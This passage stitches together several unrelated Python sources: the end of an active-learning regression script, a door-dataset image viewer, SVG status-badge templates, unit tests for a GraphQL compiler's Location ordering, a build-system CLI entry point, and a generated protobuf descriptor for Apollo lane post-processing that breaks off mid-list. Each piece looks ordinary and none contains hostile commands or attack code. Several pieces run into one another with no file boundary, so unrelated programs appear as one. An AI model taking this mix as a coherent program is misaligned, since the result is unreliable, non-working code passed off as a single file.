            loss = -t_likelihood(label.reshape(-1,1), m.reshape(-1,1), v.reshape(1,-1,1)) / X.shape[0]
            loss.backward()
            optimizer.step()
        else:
            if opt_switch % 2 == 0:
                #for b in range(mean_pseupoch):
                optimizer.zero_grad()
                batch = locality_sampler2(mean_psu,mean_ssu,mean_Q,mean_w)
                m, v = model(X[batch], switch)
                loss = -t_likelihood(y[batch].reshape(-1, 1), m.reshape(-1, 1), v.reshape(v.shape[0], -1, 1),
                                     mean_w[batch].repeat(y.shape[1])) / X.shape[0]
                loss.backward()
                optimizer.step()
            else:
                #for b in range(var_pseupoch):
                optimizer2.zero_grad()
                batch = locality_sampler2(var_psu,var_ssu,var_Q,var_w)
                m, v = model(X[batch], switch)
                loss = -t_likelihood(y[batch].reshape(-1, 1), m.reshape(-1, 1), v.reshape(v.shape[0], -1, 1),
                                     var_w[batch].repeat(y.shape[1])) / X.shape[0]
                loss.backward()
                optimizer2.step()
        # if it % 500 == 0:
        #     m, v = model(data, switch)
        #     loss = -(-v.log()/2 - ((m.flatten()-label)**2).reshape(1,-1,1) / (2 * v)).mean()
        #     print('Iter {0}/{1}, Loss {2}'.format(it, args.iters, loss.item()))
        # test on validation set once per epoch
        if it % its_per_epoch == 0:
            model.eval()
            with torch.no_grad():
                m, v = model(x_eval, switch)
                m = m * y_std + y_mean
                v = v * y_std ** 2
                if switch == 0:
                    ll = t_likelihood(y_eval, m, v.unsqueeze(0)).item()
                else:
                    ll = t_likelihood(y_eval, m, v).item()
                # if it % (500 * its_per_epoch) == 0:
                #     print('Epoch {:d}/{:d},'.format(it // its_per_epoch, epochs), 'Loss {:.4f},'.format(ll))
                # log validation performance after we are stable in the second optimization regime
                if it > args.iters * 0.60:
                    ll_list.append(ll)
                    error = torch.norm(y_eval - m, p=2, dim=1)
                    mae_list.append(error.abs().mean().item())
                    rmse_list.append((error ** 2).mean().sqrt().item())
            model.train()
            # early stop check
            # Stop if the best validation LL is more than 50 epochs old.
            if len(ll_list) - np.argmax(ll_list) > 50:
                it = args.iters
                print('Early Stop!')
        it+=1
    # get best LL
    i_best = np.argmax(ll_list)
    # evaluate model moments
    with torch.no_grad():
        # training=False switches the variance head to the 1000-sample path.
        model.training = False
        m_test, v_test = model(x_eval, 1.0)
        m_test = m_test * y_std + y_mean
        v_test = v_test * y_std ** 2
        m_pool, v_pool = model(x_pool, 1.0)
        m_pool = m_pool * y_std + y_mean
        v_pool = v_pool * y_std ** 2
    return ll_list[i_best], rmse_list[i_best], m_test.cpu().numpy(), v_test.cpu().numpy(), m_pool.cpu().numpy(), v_pool.cpu().numpy()
def detlefsen_uci_baseline(x_train, y_train, x_pool, y_pool, x_test, y_test, iterations, batch_size, parser=None):
    """Run the 'john' model as a UCI baseline.

    Returns (best validation LL, RMSE, test means, test variances,
    pool means, pool variances) exactly as produced by john().
    """
    # Start from the default CLI arguments, then override the run length.
    args = argparser(parser)
    args.iters = iterations
    args.batch_size = batch_size
    # Train the model and collect mean/variance estimates on the evaluation points.
    return john(args, x_train, y_train, x_pool, y_pool, x_test, y_test)
#%%
if __name__ == '__main__':
    args = argparser()  # get input arguments
    if args.silent:
        import warnings
        warnings.filterwarnings("ignore")
    print("==================== Training model {0} on dataset {1} ====================".format(
        args.model, args.dataset))
    # Load data
    dataset = np.load('data/regression_datasets/' + args.dataset + '.npz')
    X, y = dataset['data'], dataset['target']
    # Explicit dispatch table instead of eval(args.model): identical behavior
    # for valid names, but an unknown --model fails with a clear KeyError
    # instead of executing arbitrary command-line input.
    model_fns = {'gp': gp, 'nn': nn, 'mcdnn': mcdnn, 'ensnn': ensnn, 'john': john}
    model_fn = model_fns[args.model]
    log_score, rmse_score = [ ], [ ]
    # Train multiple models
    T = timer()
    for i in range(args.repeats):
        print("==================== Model {0}/{1} ====================".format(i+1, args.repeats))
        time.sleep(0.5)
        # Make train/pool/test split
        Xtrain, Xtest, ytrain, ytest = train_test_split(X, y,
                                                        test_size=0.2,
                                                        random_state=(i+1)*args.seed)
        Xtrain, Xpool, ytrain, ypool = train_test_split(Xtrain, ytrain,
                                                        test_size=0.75,
                                                        random_state=(i+1)*args.seed)
        T.begin()
        log_score.append([ ]); rmse_score.append([ ])
        # BUG FIX: keep the per-repeat sample count in a local variable. The
        # original overwrote args.sample_size (a fraction) with an absolute
        # count, so every repeat after the first computed a wildly wrong size.
        sample_size = int(Xpool.shape[0] * args.sample_size)
        al_iters = int(np.minimum(np.ceil(Xpool.shape[0]/sample_size), args.al_iters))
        # Active learning time
        for j in range(al_iters):
            print("======== AL iter {0}/{1} ========".format(j+1, al_iters))
            time.sleep(0.5)
            # Normalize data
            scaler = preprocessing.StandardScaler()
            scaler.fit(Xtrain)
            Xtrain = scaler.transform(Xtrain)
            Xpool = scaler.transform(Xpool)
            Xtest = scaler.transform(Xtest)
            # Fit and score model
            logpx, rmse, m, v = model_fn(args, Xtrain, ytrain, Xpool, ypool, Xtest, ytest)
            # Select the sample_size pool points the model is most uncertain
            # about (highest predictive variance).
            idx = np.argsort(v)[::-1][:sample_size]
            # Add to train, remove from pool
            Xtrain = np.concatenate((Xtrain, Xpool[idx]), axis=0)
            ytrain = np.concatenate((ytrain, ypool[idx]), axis=0)
            Xpool = np.delete(Xpool, (idx), axis=0)
            ypool = np.delete(ypool, (idx), axis=0)
            log_score[-1].append(logpx)
            rmse_score[-1].append(rmse)
        T.end()
    log_score = np.array(log_score)
    rmse_score = np.array(rmse_score)
    # Save results. (The original membership test against os.listdir() could
    # never match a nested path; makedirs with exist_ok covers both cases.)
    os.makedirs('results/active_learning_results/', exist_ok=True)
    np.savez('results/active_learning_results/' + args.dataset + '_' + args.model,
             log_score=log_score,
             rmse_score=rmse_score,
             timings=np.array(T.timings))
    # Print the results
    T.res()
import cv2
import numpy as np
from generic_dataset.dataset_folder_manager import DatasetFolderManager
from generic_dataset.utilities.color import Color
from generic_dataset.dataset_manager import DatasetManager
from gibson_env_utilities.doors_dataset.door_sample import DoorSample
# Root folder of the doors dataset on disk -- adjust to your machine.
dataset_path ='/home/michele/myfiles/doors_dataset'
# Create the DatasetFolderManager instance and read sample
folder_manager = DatasetFolderManager(dataset_path=dataset_path, folder_name='house1', sample_class=DoorSample)
# Load a sample (positive, label = 1)
sample: DoorSample = folder_manager.load_sample_using_relative_count(label=1, relative_count=0, use_thread=False)
# Seed the pretty image with a copy of the raw semantic image, convert the
# depth data to a displayable image, then colorize the doors in green.
sample.set_pretty_semantic_image(sample.get_semantic_image().copy())
sample.pipeline_depth_data_to_image().run(use_gpu=False).get_data()
sample.create_pretty_semantic_image(color=Color(red=0, green=255, blue=0))
# 2x2 mosaic: BGR + depth on top, raw + pretty semantic images below.
display_image_0 = np.concatenate((sample.get_bgr_image(), cv2.cvtColor(sample.get_depth_image(), cv2.COLOR_GRAY2BGR)), axis=1)
display_image_1 = np.concatenate((sample.get_semantic_image(), sample.get_pretty_semantic_image()), axis=1)
cv2.imshow('sample', np.concatenate((display_image_0, display_image_1), axis=0))
cv2.waitKey()
# Create DatasetManager instance and display dataset information
dataset = DatasetManager(dataset_path=dataset_path, sample_class=DoorSample)
# Save the folders' metadata to disk
dataset.save_metadata()
print('The total amount of examples are')
for label, count in dataset.get_sample_count().items():
    print(' - {0} -> {1} samples'.format(label, count))
# Static shields.io-style status badges. Each is a complete SVG document;
# the colored right segment carries the status text.
# Green "service | ok" badge.
SERVICE_OK = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="72" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="72" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#4c1" d="M49 0h23v20H49z"/><path fill="url(#b)" d="M0 0h72v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="595" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="130">ok</text><text x="595" y="140" transform="scale(.1)" textLength="130">ok</text></g> </svg>
"""
# Red "service | error" badge.
SERVICE_ERROR = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="86" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="86" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#e05d44" d="M49 0h37v20H49z"/><path fill="url(#b)" d="M0 0h86v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="665" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="270">error</text><text x="665" y="140" transform="scale(.1)" textLength="270">error</text></g> </svg>
"""
# Grey "service | unknown" badge.
SERVICE_UNKNOWN = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="110" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="110" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h49v20H0z"/><path fill="#9f9f9f" d="M49 0h61v20H49z"/><path fill="url(#b)" d="M0 0h110v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="255" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="390">service</text><text x="255" y="140" transform="scale(.1)" textLength="390">service</text><text x="785" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="510">unknown</text><text x="785" y="140" transform="scale(.1)" textLength="510">unknown</text></g> </svg>
"""
# Grey "pipeline | unknown" badge.
PIPELINE_UNKNOWN = """
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="114" height="20"><linearGradient id="b" x2="0" y2="100%"><stop offset="0" stop-color="#bbb" stop-opacity=".1"/><stop offset="1" stop-opacity=".1"/></linearGradient><clipPath id="a"><rect width="114" height="20" rx="3" fill="#fff"/></clipPath><g clip-path="url(#a)"><path fill="#555" d="M0 0h53v20H0z"/><path fill="#9f9f9f" d="M53 0h61v20H53z"/><path fill="url(#b)" d="M0 0h114v20H0z"/></g><g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110"> <text x="275" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="430">pipeline</text><text x="275" y="140" transform="scale(.1)" textLength="430">pipeline</text><text x="825" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="510">unknown</text><text x="825" y="140" transform="scale(.1)" textLength="510">unknown</text></g> </svg>
"""
# Badge template with three placeholders: segment color, then the
# availability text twice (shadow layer and foreground layer).
AVAILABILITY_TEMPLATE = """<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="132" height="20">
<linearGradient id="b" x2="0" y2="100%">
<stop offset="0" stop-color="#bbb" stop-opacity=".1"/>
<stop offset="1" stop-opacity=".1"/>
</linearGradient>
<clipPath id="a">
<rect width="132" height="20" rx="3" fill="#fff"/>
</clipPath>
<g clip-path="url(#a)">
<path fill="#555" d="M0 0h69v20H0z"/>
<path fill="{}" d="M69 0h63v20H69z"/>
<path fill="url(#b)" d="M0 0h132v20H0z"/>
</g>
<g fill="#fff" text-anchor="middle" font-family="DejaVu Sans,Verdana,Geneva,sans-serif" font-size="110">
<text x="355" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="590">availability</text>
<text x="355" y="140" transform="scale(.1)" textLength="590">availability</text>
<text x="995" y="150" fill="#010101" fill-opacity=".3" transform="scale(.1)" textLength="530">{}</text>
<text x="995" y="140" transform="scale(.1)" textLength="530">{}</text>
</g>
</svg>"""
def make_availability_svg(color_name, availability):
    """Render the availability badge SVG.

    Args:
        color_name: one of 'lightgrey', 'brightgreen', 'yellow', 'red'.
        availability: availability ratio to display, or None for 'unknown'.

    Returns:
        The badge as an SVG string.

    Raises:
        KeyError: if color_name is not one of the known colors.
    """
    # Compare against None explicitly: an availability of exactly 0.0 is a
    # legitimate value and must render as '0.00000', not 'unknown' (the
    # original truthiness test hid that case).
    text = 'unknown'
    if availability is not None:
        text = "%0.05f" % availability
    color = {
        'lightgrey': '#9f9f9f',
        'brightgreen': '#4c1',
        'yellow': '#dfb317',
        'red': '#e05d44'
    }[color_name]
    return AVAILABILITY_TEMPLATE.format(color, text, text)
|
# Copyright 2017-present Kensho Technologies, LLC.
from typing import List
import unittest
from ..compiler.helpers import BaseLocation, FoldScopeLocation, Location
def compare_sorted_locations_list(
    test_case: unittest.TestCase, sorted_locations: List[BaseLocation]
) -> None:
    """Assert that every pairwise `<` comparison agrees with the list order.

    For a correctly ascending list, element i is strictly less than element j
    exactly when i < j; check all ordered pairs, including equal indices.
    """
    for left_index, left in enumerate(sorted_locations):
        for right_index, right in enumerate(sorted_locations):
            should_be_less = left_index < right_index
            is_less = left < right
            failure_message = "{} < {}, expected result {} but got {}".format(
                left, right, should_be_less, is_less
            )
            test_case.assertEqual(should_be_less, is_less, msg=failure_message)
class LocationTests(unittest.TestCase):
    """Tests for Location / FoldScopeLocation naming and ordering behavior."""

    def test_location_name(self) -> None:
        """Location names encode the vertex path, visit counter, and field."""
        base_location = Location(("Animal",))
        self.assertEqual(("Animal___1", None), base_location.get_location_name())
        base_at_field = base_location.navigate_to_field("name")
        self.assertEqual(("Animal___1", "name"), base_at_field.get_location_name())
        # Revisiting the same vertex bumps the visit-counter suffix (___1 -> ___2).
        revisited_location = base_location.revisit()
        self.assertEqual(("Animal___2", None), revisited_location.get_location_name())
        revisited_at_field = revisited_location.navigate_to_field("name")
        self.assertEqual(("Animal___2", "name"), revisited_at_field.get_location_name())
        # Traversing an edge extends the path component of the name.
        child_location = base_location.navigate_to_subpath("out_Animal_ParentOf")
        self.assertEqual(
            ("Animal__out_Animal_ParentOf___1", None), child_location.get_location_name()
        )
        child_at_field = child_location.navigate_to_field("name")
        self.assertEqual(
            ("Animal__out_Animal_ParentOf___1", "name"), child_at_field.get_location_name()
        )

    def test_location_comparisons(self) -> None:
        """A hand-sorted list of Locations compares as strictly ascending."""
        sorted_locations = [
            Location(("Animal", "in_Animal_Parent_of"), "uuid", 3),
            Location(("Animal", "in_Animal_Parent_of", "in_Animal_FedAt"), "name", 2),
            Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "name", 1),
            Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), None, 2),
            Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "name", 2),
            Location(("Animal", "in_Animal_Parent_of", "out_Animal_FedAt"), "uuid", 2),
        ]
        # Consistency fix: reuse the shared pairwise-ordering helper instead of
        # duplicating its double loop inline, matching test_mixed_location_comparisons.
        compare_sorted_locations_list(self, sorted_locations)

    def test_fold_scope_location_comparisons(self) -> None:
        """A hand-sorted list of FoldScopeLocations compares as strictly ascending."""
        sorted_locations = [
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")), (("in", "Animal_OfSpecies"),), None
            ),
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")), (("out", "Animal_OfSpecies"),), None
            ),
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")),
                (("out", "Animal_OfSpecies"), ("in", "out_Animal_FedAt")),
                None,
            ),
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")),
                (("out", "Animal_OfSpecies"), ("in", "out_Animal_FedAt")),
                "name",
            ),
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")),
                (("out", "Animal_OfSpecies"), ("in", "out_Animal_FedAt")),
                "uuid",
            ),
        ]
        compare_sorted_locations_list(self, sorted_locations)

    def test_mixed_location_comparisons(self) -> None:
        """Location and FoldScopeLocation instances order consistently together."""
        sorted_locations = [
            FoldScopeLocation(
                Location(("Animal", "in_Animal_Parent_of")), (("in", "Animal_OfSpecies"),), None
            ),
            Location(("Animal", "in_Animal_Parent_of"), "name"),
            FoldScopeLocation(
                Location(("Animal", "out_Animal_Parent_of")), (("in", "Animal_OfSpecies"),), None
            ),
        ]
        compare_sorted_locations_list(self, sorted_locations)
|
__all__ = ['cli_setup_build_system']
import argparse
import colorama
from cli import *
from ext.utils.path import *
from file_structure import *
from .setup import *
def cli_setup_build_system():
    """CLI entry point: parse arguments and run the build-system setup."""
    # TODO : Fix description
    # NOTE(review): there is no space between the closing quote and "folder"
    # in the rendered help text — looks like a typo; confirm before changing.
    description = (
        f"Creates the '{colorama.Fore.LIGHTBLACK_EX}{BUILD_DIR_NAME}{colorama.Style.RESET_ALL}'"
        'folder and setup specific build system builds inside.'
    )
    arg_parser = argparse.ArgumentParser(description=description)
    add_optional_path_arg(arg_parser, ROOT_DIR_ARG, path_arg_help="The project's root directory")
    root_dir: TUnion_AnyPath = parse_optional_path_arg(arg_parser, ROOT_DIR_ARG)
    arg_parser.parse_args()

    def cli_cmd():
        # Deferred so the error-managing wrapper controls when setup runs.
        setup_build_system(root_dir=root_dir, cli_mode=True)

    try_cmd_except_managed_errors(cli_cmd, arg_parser)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: modules/perception/proto/lane_post_process_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='modules/perception/proto/lane_post_process_config.proto',
package='apollo.perception.lane_post_process_config',
syntax='proto2',
serialized_pb=_b('\n7modules/perception/proto/lane_post_process_config.proto\x12*apollo.perception.lane_post_process_config\"\xdc\r\n\x0cModelConfigs\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07version\x18\x02 \x01(\t\x12\x12\n\nspace_type\x18\x03 \x01(\t\x12\x13\n\x0bimage_width\x18\x04 \x01(\x05\x12\x14\n\x0cimage_height\x18\x05 \x01(\x05\x12\x0b\n\x03roi\x18\x06 \x03(\x02\x12\x14\n\x0cuse_non_mask\x18\x07 \x01(\x08\x12\x10\n\x08non_mask\x18\x08 \x03(\x02\x12(\n\x1alane_map_confidence_thresh\x18\t \x01(\x02:\x04\x30.95\x12\x18\n\x0c\x63\x63_split_siz\x18\n \x01(\x02:\x02\x35\x30\x12\x18\n\x0c\x63\x63_split_len\x18\x0b \x01(\x05:\x02\x32\x35\x12\x1c\n\x10min_cc_pixel_num\x18\x0c \x01(\x05:\x02\x31\x30\x12\x16\n\x0bmin_cc_size\x18\r \x01(\x05:\x01\x35\x12 \n\x13min_y_search_offset\x18\x0e \x01(\x02:\x03\x30.5\x12&\n\x19min_y_search_offset_image\x18\x0f \x01(\x02:\x03\x30.5\x12\x14\n\x0c\x61ssoc_method\x18\x10 \x01(\t\x12 \n\x12\x61ssoc_min_distance\x18\x11 \x01(\x02:\x04-0.5\x12$\n\x18\x61ssoc_min_distance_image\x18\x12 \x01(\x02:\x02-3\x12\x1e\n\x12\x61ssoc_max_distance\x18\x13 \x01(\x02:\x02\x36\x30\x12%\n\x18\x61ssoc_max_distance_image\x18\x14 \x01(\x02:\x03\x34\x30\x30\x12\"\n\x15\x61ssoc_distance_weight\x18\x15 \x01(\x02:\x03\x30.4\x12%\n\x19\x61ssoc_max_deviation_angle\x18\x16 \x01(\x02:\x02\x31\x35\x12+\n\x1f\x61ssoc_max_deviation_angle_image\x18\x17 \x01(\x02:\x02\x34\x35\x12)\n\x1c\x61ssoc_deviation_angle_weight\x18\x18 \x01(\x02:\x03\x30.2\x12\'\n\x1c\x61ssoc_max_departure_distance\x18\x19 \x01(\x02:\x01\x33\x12.\n\"assoc_max_departure_distance_image\x18\x1a \x01(\x02:\x02\x38\x30\x12,\n\x1f\x61ssoc_departure_distance_weight\x18\x1b \x01(\x02:\x03\x30.2\x12#\n\x17\x61ssoc_max_relative_orie\x18\x1c \x01(\x02:\x02\x31\x35\x12)\n\x1d\x61ssoc_max_relative_orie_image\x18\x1d \x01(\x02:\x02\x34\x35\x12\'\n\x1a\x61ssoc_relative_orie_weight\x18\x1e \x01(\x02:\x03\x30.2\x12\x30\n%assoc_min_orientation_estimation_size\x18\x1f 
\x01(\x02:\x01\x33\x12\x37\n+assoc_min_orientation_estimation_size_image\x18 \x01(\x02:\x02\x31\x30\x12\"\n\x17max_cc_marker_match_num\x18! \x01(\x05:\x01\x31\x12\x1d\n\x11slide_window_size\x18\" \x01(\x02:\x02\x31\x35\x12$\n\x17slide_window_size_image\x18# \x01(\x02:\x03\x32\x30\x30\x12%\n\x1aslide_window_max_point_num\x18$ \x01(\x05:\x01\x33\x12*\n\x1fmax_group_prediction_marker_num\x18% \x01(\x05:\x01\x33\x12\x31\n&orientation_estimation_skip_marker_num\x18& \x01(\x05:\x01\x31\x12!\n\x16lane_interval_distance\x18\' \x01(\x02:\x01\x34\x12(\n\x1dmin_instance_size_prefiltered\x18( \x01(\x02:\x01\x33\x12/\n#min_instance_size_prefiltered_image\x18) \x01(\x02:\x02\x32\x30\x12)\n\x1dmax_size_to_fit_straight_line\x18* \x01(\x02:\x02\x31\x30\x12\x30\n#max_size_to_fit_straight_line_image\x18+ \x01(\x02:\x03\x33\x30\x30\x12 \n\x12online_pitch_angle\x18, \x01(\x02:\x04-2.5\x12\x1a\n\rground_height\x18- \x01(\x02:\x03\x31.6\x12\x30\n#max_distance_to_see_for_transformer\x18. \x01(\x02:\x03\x35\x30\x30\x12\x19\n\x0elane_map_scale\x18/ \x01(\x02:\x01\x32\x12\x18\n\x0bstart_y_pos\x18\x30 \x01(\x05:\x03\x33\x31\x32\x12\x1b\n\x0elane_map_width\x18\x31 \x01(\x05:\x03\x39\x36\x30\x12\x1c\n\x0flane_map_height\x18\x32 \x01(\x05:\x03\x33\x38\x34')
)
_MODELCONFIGS = _descriptor.Descriptor(
name='ModelConfigs',
full_name='apollo.perception.lane_post_process_config.ModelConfigs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='apollo.perception.lane_post_process_config.ModelConfigs.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='apollo.perception.lane_post_process_config.ModelConfigs.version', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='space_type', full_name='apollo.perception.lane_post_process_config.ModelConfigs.space_type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_width', full_name='apollo.perception.lane_post_process_config.ModelConfigs.image_width', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='image_height', full_name='apollo.perception.lane_post_process_config.ModelConfigs.image_height', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='roi', full_name='apollo.perception.lane_post_process_config.ModelConfigs.roi', index=5,
number=6, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='use_non_mask', full_name='apollo.perception.lane_post_process_config.ModelConfigs.use_non_mask', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='non_mask', full_name='apollo.perception.lane_post_process_config.ModelConfigs.non_mask', index=7,
number=8, type=2, cpp_type=6, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='lane_map_confidence_thresh', full_name='apollo.perception.lane_post_process_config.ModelConfigs.lane_map_confidence_thresh', index=8,
number=9, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.95),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cc_split_siz', full_name='apollo.perception.lane_post_process_config.ModelConfigs.cc_split_siz', index=9,
number=10, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(50),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cc_split_len', full_name='apollo.perception.lane_post_process_config.ModelConfigs.cc_split_len', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=25,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_cc_pixel_num', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_cc_pixel_num', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_cc_size', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_cc_size', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=5,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_y_search_offset', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_y_search_offset', index=13,
number=14, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='min_y_search_offset_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.min_y_search_offset_image', index=14,
number=15, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_method', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_method', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_distance', index=16,
number=17, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_min_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_min_distance_image', index=17,
number=18, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(-3),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_distance', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_distance', index=18,
number=19, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(60),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_distance_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_distance_image', index=19,
number=20, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(400),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_distance_weight', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_distance_weight', index=20,
number=21, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.4),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_deviation_angle', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_deviation_angle', index=21,
number=22, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(15),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assoc_max_deviation_angle_image', full_name='apollo.perception.lane_post_process_config.ModelConfigs.assoc_max_deviation_angle_image', index=22,
number=23, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(45),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
